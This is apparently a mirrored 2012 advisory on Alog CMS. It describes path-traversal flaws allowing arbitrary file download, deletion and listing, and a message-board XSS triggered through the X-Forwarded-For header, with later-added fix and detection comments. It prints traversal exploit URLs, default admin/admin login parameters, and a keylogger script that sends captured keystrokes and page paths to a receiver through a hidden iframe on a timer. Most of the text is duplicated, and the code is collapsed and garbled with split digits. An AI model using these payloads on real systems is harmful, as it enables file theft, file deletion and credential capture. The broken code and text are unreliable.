Alog CMS XSS and arbitrary file download/read vulnerability - vulnerability warning - the black bar safety net

2012-11-22T00:00:00
ID MYHACK58:62201235680
Type myhack58
Reporter 佚名
Modified 2012-11-22T00:00:00

Description

| Alog CMS

Admin backend: arbitrary file download, arbitrary file deletion, arbitrary directory listing

Vulnerable file: admin/mod/uploadfile.mod.php

/* Vulnerable excerpt from admin/mod/uploadfile.mod.php as quoted by the advisory. This collapsed line is not runnable as printed: the stray `"` and the `//` comment leave the trailing $currentPath assignment outside executable code.
   `dir` is read from GET or POST and appended to the upload root with no canonicalization and no prefix check, so `../` segments escape static/upload/.
   Fix direction: resolve the joined path with realpath() and reject it unless it still begins with the resolved $baseDir; additionally reject any `dir` value containing `..` or starting with a slash. */
$baseDir = SITE_ROOT.'static/upload/'; $currentDir = $_GET['dir'] ? $_GET['dir'] : ($_POST['dir'] ? $_POST['dir'] : "); //without any filter $currentPath = $baseDir.$ currentDir;

/* Download branch of the same handler, quoted inline by the advisory (`Any download` before the code and `EXP …` after it are the advisory's own labels, kept verbatim; on this collapsed line the first `//` comment swallows everything after the $uploadfile assignment).
   $_GET['uploadfile'] is joined onto $currentPath unchanged, so a traversal in either parameter lets is_file()/readfile() serve any file the web server process can read; the example URL reaches admin/index.php.
   $filename_info is never assigned (the array is $fileNameInfo), so $fileType is empty and the Content-type header degenerates to `application/x-`; the Content-Disposition filename is also emitted unquoted from user-controlled input.
   Fix direction: canonicalize the final path with realpath() and require it to stay under the resolved upload root before any is_file()/readfile() call; the delete action targeted by the advisory's second URL presumably needs the same guard. */
Any download $uploadfile = $_GET['uploadfile'] ? $currentPath.'/'.$ _GET['uploadfile'] : $currentPath; //$_GET['uploadfile']the file name is not often any security filtering if (@is_file($uploadfile)) //if file exists download { $fileName = basename($uploadfile); $fileNameInfo = explode('.', $fileName); $fileType = $filename_info[count($fileNameInfo) - 1]; header('Content-type: application/x-'.$ fileType); header('Content-Disposition: attachment; filename='.$ fileName); header('Content-Description: PHP3 Generated Data'); readfile($uploadfile); exit; } EXP http://localhost/upload/admin/index.php?m=uploadfile&a=download&dir=advertisiment/../../../admin&uploadfile=index.php

http://localhost/upload/admin/index.php?m=uploadfile&a=delete&dir=&uploadfile=advertisiment/../../../2.php

http://localhost/upload/admin/index.php?m=login&a=login http://localhost/upload/admin/index.php?m=login&a=login userName=admin&password=admin&VCode=anqm&lang=zh-cn

Enumerate the files in the directory

Message board: the X-Forwarded-For header can be used to bypass the filtering, leading to cross-site scripting (XSS)

Header: X-Forwarded-For: 192.168.1.1

Alog CMS

Admin backend: arbitrary file download, arbitrary file deletion, arbitrary directory listing

Vulnerable file: admin/mod/uploadfile.mod.php

/* Vulnerable excerpt from admin/mod/uploadfile.mod.php as quoted by the advisory. This collapsed line is not runnable as printed: the stray `"` and the `//` comment leave the trailing $currentPath assignment outside executable code.
   `dir` is read from GET or POST and appended to the upload root with no canonicalization and no prefix check, so `../` segments escape static/upload/.
   Fix direction: resolve the joined path with realpath() and reject it unless it still begins with the resolved $baseDir; additionally reject any `dir` value containing `..` or starting with a slash. */
$baseDir = SITE_ROOT.'static/upload/'; $currentDir = $_GET['dir'] ? $_GET['dir'] : ($_POST['dir'] ? $_POST['dir'] : "); //without any filter $currentPath = $baseDir.$ currentDir;

/* Download branch of the same handler, quoted inline by the advisory (`Any download` before the code and `EXP …` after it are the advisory's own labels, kept verbatim; on this collapsed line the first `//` comment swallows everything after the $uploadfile assignment).
   $_GET['uploadfile'] is joined onto $currentPath unchanged, so a traversal in either parameter lets is_file()/readfile() serve any file the web server process can read; the example URL reaches admin/index.php.
   $filename_info is never assigned (the array is $fileNameInfo), so $fileType is empty and the Content-type header degenerates to `application/x-`; the Content-Disposition filename is also emitted unquoted from user-controlled input.
   Fix direction: canonicalize the final path with realpath() and require it to stay under the resolved upload root before any is_file()/readfile() call; the delete action targeted by the advisory's second URL presumably needs the same guard. */
Any download $uploadfile = $_GET['uploadfile'] ? $currentPath.'/'.$ _GET['uploadfile'] : $currentPath; //$_GET['uploadfile']the file name is not often any security filtering if (@is_file($uploadfile)) //if file exists download { $fileName = basename($uploadfile); $fileNameInfo = explode('.', $fileName); $fileType = $filename_info[count($fileNameInfo) - 1]; header('Content-type: application/x-'.$ fileType); header('Content-Disposition: attachment; filename='.$ fileName); header('Content-Description: PHP3 Generated Data'); readfile($uploadfile); exit; } EXP http://localhost/upload/admin/index.php?m=uploadfile&a=download&dir=advertisiment/../../../admin&uploadfile=index.php

http://localhost/upload/admin/index.php?m=uploadfile&a=delete&dir=&uploadfile=advertisiment/../../../2.php

http://localhost/upload/admin/index.php?m=login&a=login http://localhost/upload/admin/index.php?m=login&a=login userName=admin&password=admin&VCode=anqm&lang=zh-cn

Enumerate the files in the directory

Message board: the X-Forwarded-For header can be used to bypass the filtering, leading to cross-site scripting (XSS)

Header: X-Forwarded-For: 192.168.1.1

Using the cross-site scripting to delete backend files

Obtain the backend path and monitor typed characters: 1.js

/* Keystroke-capture script the advisory pairs with the message-board X-Forwarded-For XSS (truncated copy; the fuller version follows below). As printed on this collapsed line, the first `//` comment swallows everything after `var keys;`, so nothing past that declaration executes.
   Intent as written: replace document.onkeypress, map Space and Enter to `[Space]`/`[Enter]`, and append every other key (via String.fromCharCode) to the global `keys`; `keys` starts undefined, so the accumulated string would begin with "undefined".
   Defensive note: the root cause is the unescaped X-Forwarded-For value on the message board — output-encode it; a Content-Security-Policy that forbids inline script on admin pages would also block an injected handler like this one. */
var keys; //save keyboard recording var key; document. onkeypress = function(e) { //hijacking the keyboard message function get = window. event ? event:e;//create the event object key = get. keyCode ? get. keyCode : get. charCode; switch(key){ case 3 2 : key = '[Space]';break; case 1 3 : key = '[Enter]';break; default : key = String. fromCharCode(key); keys += key; //alert(key+"||"+keys); }

Using the cross-site scripting to delete backend files

Obtain the backend path and monitor typed characters: 1.js

/* Keystroke-capture script the advisory pairs with the message-board X-Forwarded-For XSS. As printed on this collapsed line, the first `//` comment swallows everything after `var keys;` (including function f and the setInterval call), and the digit runs are extraction-garbled, so the snippet does not execute as shown.
   Intent as written: replace document.onkeypress, map Space and Enter to `[Space]`/`[Enter]`, append every other key (via String.fromCharCode) to the global `keys` (which starts undefined, so the string would begin with "undefined"); f() then appends a 0x0 IFRAME to the body whose src carries escape(window.location.pathname) plus `keys` to a receiver (localhost in the snippet), and window.setInterval repeats f on a timer.
   Defensive note: the root cause is the unescaped X-Forwarded-For value on the message board — output-encode it. Indicators of this payload running on admin pages are an unexpected zero-size iframe injected into the DOM and periodic outbound requests whose query string contains the current path; a Content-Security-Policy that forbids inline script and restricts frame-src would block it. */
var keys; //save keyboard recording var key; document. onkeypress = function(e) { //hijacking the keyboard message function get = window. event ? event:e;//create the event object key = get. keyCode ? get. keyCode : get. charCode; switch(key){ case 3 2 : key = '[Space]';break; case 1 3 : key = '[Enter]';break; default : key = String. fromCharCode(key); keys += key; //alert(key+"||"+keys); } } function f() { $url=escape(window. location. pathname); ifm=document. createElement("IFRAME"); document. body. appendChild(ifm); ifm. width=0; ifm. height=0; ifm. src="http://localhost/upload/7.php?x="+$url+"//"+keys; } window. setInterval(f,5 0 0 0) //setTimeout(f,"1 0 0 0");